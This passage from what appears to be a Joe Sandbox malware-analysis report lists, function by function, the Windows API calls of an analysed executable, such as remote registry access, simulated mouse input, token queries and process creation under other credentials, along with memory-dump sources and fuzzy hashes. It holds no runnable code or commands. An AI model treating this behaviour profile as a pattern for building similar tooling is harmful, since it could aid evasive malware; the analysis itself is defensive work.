                                                  • __calloc_crt.LIBCMT ref: 00BE9B19
                                                  • __initptd.LIBCMT ref: 00BE9B3B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BE9B42
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3567560977-0
                                                  • Opcode ID: f094141f3987de57b84a0a0cf656a733e0d76b0ceadbf5a52d510ea75c1fdc4a
                                                  • Instruction ID: 809135381a06870deef06aa9eed417062b67c1eb5aecaaaf123d174f7f7e90fd
                                                  • Opcode Fuzzy Hash: f094141f3987de57b84a0a0cf656a733e0d76b0ceadbf5a52d510ea75c1fdc4a
                                                  • Instruction Fuzzy Hash: 98F090325197A16AE774B777BC0778E26D1DF02734F204AFDF664D61E2EF20884941A0
                                                  Function 00BE406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BE3F85), ref: 00BE4085
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00BE408C
                                                  • EncodePointer.KERNEL32(00000000), ref: 00BE4097
                                                  • DecodePointer.KERNEL32(00BE3F85), ref: 00BE40B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 77afe1b567682156ae9882231ace6b53897a4ebdfd108611d5ff5f89f602f335
                                                  • Instruction ID: c5db6b8c54b99a028b69affeb3067515913582109ceff952ee1e086bbf11a3c1
                                                  • Opcode Fuzzy Hash: 77afe1b567682156ae9882231ace6b53897a4ebdfd108611d5ff5f89f602f335
                                                  • Instruction Fuzzy Hash: 4EE09278981240ABEA20AF61EC0DB0D3AE5B706F42F105038F501E10E0CBB64645DB18
                                                  Function 00BC1DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00BC1DDC
                                                  • GetWindowRect.USER32(?,?), ref: 00BC1E1D
                                                  • ScreenToClient.USER32(?,?), ref: 00BC1E45
                                                  • GetClientRect.USER32(?,?), ref: 00BC1F74
                                                  • GetWindowRect.USER32(?,?), ref: 00BC1F8D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Rect$Client$Window$Screen
                                                  • String ID:
                                                  • API String ID: 1296646539-0
                                                  • Opcode ID: a24e8cfc42627ced51a5f56f9118ceee383abe9a57486be82223382efa7eaa50
                                                  • Instruction ID: a98882caf0a6754c5479ac32ceb96be3b6caa097a41fcc1688172e97fbf9a41d
                                                  • Opcode Fuzzy Hash: a24e8cfc42627ced51a5f56f9118ceee383abe9a57486be82223382efa7eaa50
                                                  • Instruction Fuzzy Hash: 84B1497990024ADBDB10CFA8C480BEEB7F1FF09310F1495A9ED59EB256DB30A940CB64
                                                  Function 00C264B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                  • Instruction ID: 92f600aa7c86ab0c4c8ae73a91290a2df817fe0ef2e8b7d283c734431daf2f01
                                                  • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                  • Instruction Fuzzy Hash: B3619B309002AAABDF01EF61DC86FFE37A5AF05308F0445A8F8555B292DB74ED45DB60
                                                  Function 00C401E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C402BD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C402FD
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C40320
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C40349
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C4038C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C40399
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: 01ae99bc040bdcc600e7cd4eefffe585395fe03d5f6ce21400b1b346d657ace1
                                                  • Instruction ID: 6a4cf31aa89b8a0d5a57fdd1128388e18af1d5ce0df1492a24b55170ce0e5227
                                                  • Opcode Fuzzy Hash: 01ae99bc040bdcc600e7cd4eefffe585395fe03d5f6ce21400b1b346d657ace1
                                                  • Instruction Fuzzy Hash: CE517A31208200AFC710EF64C885E6FBBE9FF89314F14496DF9958B2A2DB71E945DB52
                                                  Function 00C45799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00C457FB
                                                  • GetMenuItemCount.USER32(00000000), ref: 00C45832
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C4585A
                                                  • GetMenuItemID.USER32(?,?), ref: 00C458C9
                                                  • GetSubMenu.USER32(?,?), ref: 00C458D7
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C45928
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: 9142857c9f643ca83f03d248cc472e2966fe2c23ac56c00aec7afeb2ff9bbaa0
                                                  • Instruction ID: 9b55d8314ef2fe66897888e5531e30b0b97739ab127e24e68ce301d47cee7275
                                                  • Opcode Fuzzy Hash: 9142857c9f643ca83f03d248cc472e2966fe2c23ac56c00aec7afeb2ff9bbaa0
                                                  • Instruction Fuzzy Hash: 2D514A35E00615EFDF11AF64C845AAEB7F4FF49720F1040A9E851AB292CB70AE429B90
                                                  Function 00C1EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C1EF06
                                                  • VariantClear.OLEAUT32(00000013), ref: 00C1EF78
                                                  • VariantClear.OLEAUT32(00000000), ref: 00C1EFD3
                                                  • _memmove.LIBCMT ref: 00C1EFFD
                                                  • VariantClear.OLEAUT32(?), ref: 00C1F04A
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C1F078
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: b52a5f61b131117ac461dede7ee622dc1233f17f39d52edf903896911544d6dc
                                                  • Instruction ID: f6442fb7149ef627e7f0591da0633967fa11753f42bc1cb45577a31afff26ab0
                                                  • Opcode Fuzzy Hash: b52a5f61b131117ac461dede7ee622dc1233f17f39d52edf903896911544d6dc
                                                  • Instruction Fuzzy Hash: 2B5158B5A00209EFCB14CF58C884AAAB7F8FF4D314B158569ED59DB301E734E952CBA0
                                                  Function 00C2220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22258
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C222A3
                                                  • IsMenu.USER32(00000000), ref: 00C222C3
                                                  • CreatePopupMenu.USER32 ref: 00C222F7
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00C22355
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C22386
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: eb6068b1029ccc759d7d4f46fbd0050fbadc8bab613ae8c9ef72262bead3e128
                                                  • Instruction ID: fa23f09e838211a0a6b9b8aff031c59eba7cfa711cb3abcbbd7a3cf1dc7cb8a8
                                                  • Opcode Fuzzy Hash: eb6068b1029ccc759d7d4f46fbd0050fbadc8bab613ae8c9ef72262bead3e128
                                                  • Instruction Fuzzy Hash: FA51D170600269FFDF21CF68E988BAEBBF9FF05314F104129E861976A0D3788A04CB51
                                                  Function 00BC1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00BC179A
                                                  • GetWindowRect.USER32(?,?), ref: 00BC17FE
                                                  • ScreenToClient.USER32(?,?), ref: 00BC181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BC182C
                                                  • EndPaint.USER32(?,?), ref: 00BC1876
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: bcb4e2f753822709387fce5a33a6fb0f8bd8c66ba67c972198f6ca846429a897
                                                  • Instruction ID: 3f6d4aa2b8f7bf0858610580db1f5e78a4bead56305cbbda0d15041c779890f9
                                                  • Opcode Fuzzy Hash: bcb4e2f753822709387fce5a33a6fb0f8bd8c66ba67c972198f6ca846429a897
                                                  • Instruction Fuzzy Hash: D0419D75504200AFD710DF28CC84FBA7BE8FB46724F044AADFAA4972A2D7709845DB61
                                                  Function 00C4B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00C857B0,00000000,00EE54C8,?,?,00C857B0,?,00C4B5A8,?,?), ref: 00C4B712
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00C4B736
                                                  • ShowWindow.USER32(00C857B0,00000000,00EE54C8,?,?,00C857B0,?,00C4B5A8,?,?), ref: 00C4B796
                                                  • ShowWindow.USER32(00000000,00000004,?,00C4B5A8,?,?), ref: 00C4B7A8
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00C4B7CC
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C4B7EF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: ac82a4e1628e33bc37b8d354c638a8317fad7459d2501b3ef35a74a9c8394739
                                                  • Instruction ID: 22726b193dfff070671819cad2c43da57ff73a631e1b0b9f580153cf07acf274
                                                  • Opcode Fuzzy Hash: ac82a4e1628e33bc37b8d354c638a8317fad7459d2501b3ef35a74a9c8394739
                                                  • Instruction Fuzzy Hash: EC417C34600240AFDB26CF28C599B957BE1FF45310F1841B9FA688F6A2C731ED56CB60
                                                  Function 00C3709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00C34E41,?,?,00000000,00000001), ref: 00C370AC
                                                    • Part of subcall function 00C339A0: GetWindowRect.USER32(?,?), ref: 00C339B3
                                                  • GetDesktopWindow.USER32 ref: 00C370D6
                                                  • GetWindowRect.USER32(00000000), ref: 00C370DD
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C3710F
                                                    • Part of subcall function 00C25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  • GetCursorPos.USER32(?), ref: 00C3713B
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C37199
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 4f324104c3d12c6857e86afc6547952e1ab7d81d01111ff59022113e4e09e3f4
                                                  • Instruction ID: 94fe77a2cc3bce77674c47bf2fed3e6e5b4e2add74f3c8d54c25e4af419e0097
                                                  • Opcode Fuzzy Hash: 4f324104c3d12c6857e86afc6547952e1ab7d81d01111ff59022113e4e09e3f4
                                                  • Instruction Fuzzy Hash: 8F31D272509305ABD720DF14D849F9FB7E9FF89314F000A19F59997191C670EA09CB92
                                                  Function 00C18879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C180C0
                                                    • Part of subcall function 00C180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C180CA
                                                    • Part of subcall function 00C180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C180D9
                                                    • Part of subcall function 00C180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C180E0
                                                    • Part of subcall function 00C180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C180F6
                                                  • GetLengthSid.ADVAPI32(?,00000000,00C1842F), ref: 00C188CA
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C188D6
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C188DD
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C188F6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C1842F), ref: 00C1890A
                                                  • HeapFree.KERNEL32(00000000), ref: 00C18911
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: 80cea82bac760b03703c5914ed8a87b9c7719cdb337c8fcad48b6b47659cbfd9
                                                  • Instruction ID: ad43750df9bbe243dc0ef3348e011a3c91d0ca8e49c79badaa9acb954e9596d0
                                                  • Opcode Fuzzy Hash: 80cea82bac760b03703c5914ed8a87b9c7719cdb337c8fcad48b6b47659cbfd9
                                                  • Instruction Fuzzy Hash: 7311AF35505209FFDB109FA4DC09BFE77A8FB46315F10406DE89597210CB329A89EB60
                                                  Function 00C185B0 Relevance: 9.1, APIs: 6, Instructions: 61processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C185E2
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C185E9
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C185F8
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C18603
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C18632
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C18646
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 962b22a14ae9e756a18740b1ac3391bd799562df2c7610f28b63195b06ed3209
                                                  • Instruction ID: 612c5b8b9041edcfb7c008ed3995949bcb92e818101c7084926556b9027093ce
                                                  • Opcode Fuzzy Hash: 962b22a14ae9e756a18740b1ac3391bd799562df2c7610f28b63195b06ed3209
                                                  • Instruction Fuzzy Hash: 24117976504109AFDF128FA4DC48BEE7BA9FF4A314F044069FE04A2160C7768E65EB20
                                                  Function 00C1B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C1B7B5
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C1B7C6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C1B7CD
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C1B7D5
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C1B7EC
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00C1B7FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: d7173afb9f32750a1ab11eb641a16cf0255125b559de6c4f5cd94e01951eb41c
                                                  • Instruction ID: 901c9e4ec2bc96fa074646c0c1ea22396297cd57b655e52de49d2e5dd26ca9cb
                                                  • Opcode Fuzzy Hash: d7173afb9f32750a1ab11eb641a16cf0255125b559de6c4f5cd94e01951eb41c
                                                  • Instruction Fuzzy Hash: EA018475E00319BBEB109BB69C45B9EBFB8EB49351F044079FA08E7291D6309D01CFA0
                                                  Function 00BE0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BE0193
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BE019B
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BE01A6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BE01B1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BE01B9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BE01C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
